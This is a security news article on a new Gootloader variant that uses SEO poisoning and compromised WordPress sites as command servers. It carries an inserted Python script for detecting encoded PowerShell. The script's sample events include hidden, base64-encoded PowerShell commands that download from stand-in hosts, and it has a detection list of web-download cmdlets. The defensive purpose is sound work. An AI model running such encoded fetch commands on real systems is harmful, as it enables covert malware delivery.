
Gootloader, new variant worries: even more difficult to detect

A new variant of the Gootloader malware, identified in recent days, is worrying security experts.

The malware, which the United States Cybersecurity and Infrastructure Security Agency (CISA) listed in 2021 as one of the main online threats, was already behind an intense campaign last summer. In the past, Gootloader was used as an initial access vector to deliver other notorious malware such as Cobalt Strike, IcedID or SystemBC.

Yesterday, however, researchers at IBM X-Force noticed anomalous behavior by this malware. While it still uses infection techniques similar to those of earlier versions, it now appears to be deployed as a tool downloaded after the initial infection, capable of receiving commands from a remote server via encrypted PowerShell.

Gootloader uses SEO Poisoning techniques and compromised WordPress sites to spread

According to Golo Mühr and Ole Villadsen of IBM, “The Gootloader group’s introduction of its own custom bot late in the attack chain is an attempt to avoid detection when using standard C2 tools such as CobaltStrike or RDP”.

In the same experts’ words, “This new variant is a lightweight but effective malware that allows attackers to quickly spread throughout the network and distribute additional payloads”. As for distribution techniques, the main one is SEO Poisoning, with compromised websites used to trick victims into downloading the payload that starts the infection.

Researchers quickly realized that Gootloader is difficult to block. Mühr and Villadsen explained that “GootBot implants, each containing a different C2 server running on a compromised WordPress site, have spread in large numbers across infected corporate domains in hopes of reaching a domain controller”.
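The two behaviours described above, encoded PowerShell talking to a C2 and many implants each pointing at a different compromised site, suggest one defensive check: decode `-EncodedCommand` payloads from process-creation telemetry and list, per internal host, the distinct domains those scripts fetch from. The script below is an added example, not code from IBM X-Force or the article; the host names, domains and log lines are constructed, not indicators from the report.

```python
import base64
import re
from collections import defaultdict

# Regex for PowerShell's encoded-command switch and its base64 argument.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Cmdlets/methods that fetch content from the web inside a decoded script.
DOWNLOAD_CALLS = ("invoke-webrequest", "invoke-restmethod", "downloadstring", "downloadfile")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script of an encoded PowerShell command line, or None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Map each host to the sorted domains its encoded PowerShell downloads from."""
    callouts = defaultdict(set)
    for host, cmdline in events:
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        if not any(call in script.lower() for call in DOWNLOAD_CALLS):
            continue  # encoded, but not fetching anything: lower priority
        for domain in URL.findall(script):
            callouts[host].add(domain)
    return {host: sorted(domains) for host, domains in callouts.items()}


# Constructed sample events as (host, command line); hosts and domains are hypothetical.
SAMPLE_EVENTS = [
    ("WS01", "powershell.exe -nop -w hidden -enc " + encode_ps("Invoke-WebRequest http://blog-a.example/wp-content/x.php")),
    ("WS01", "powershell.exe -nop -w hidden -enc " + encode_ps("Invoke-WebRequest http://blog-b.example/wp-includes/y.php")),
    ("WS02", "powershell.exe -NonInteractive -EncodedCommand " + encode_ps("(New-Object Net.WebClient).DownloadString('http://blog-c.example/?p=1')")),
    ("WS03", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("WS04", "powershell.exe -enc " + encode_ps("Get-Date")),
]

if __name__ == "__main__":
    for host, domains in analyze(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(domains))
```

A host with several distinct callout domains, each on what looks like a WordPress path, is the pattern worth escalating; a single encoded `Get-Date` is not.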

The use of techniques such as SEO Poisoning combined with compromised WordPress sites is nothing new for the group behind this malware. The collective has been active since 2014 and has repeatedly exploited search engines in its infection strategies, and has also adopted ransomware in its criminal activities.
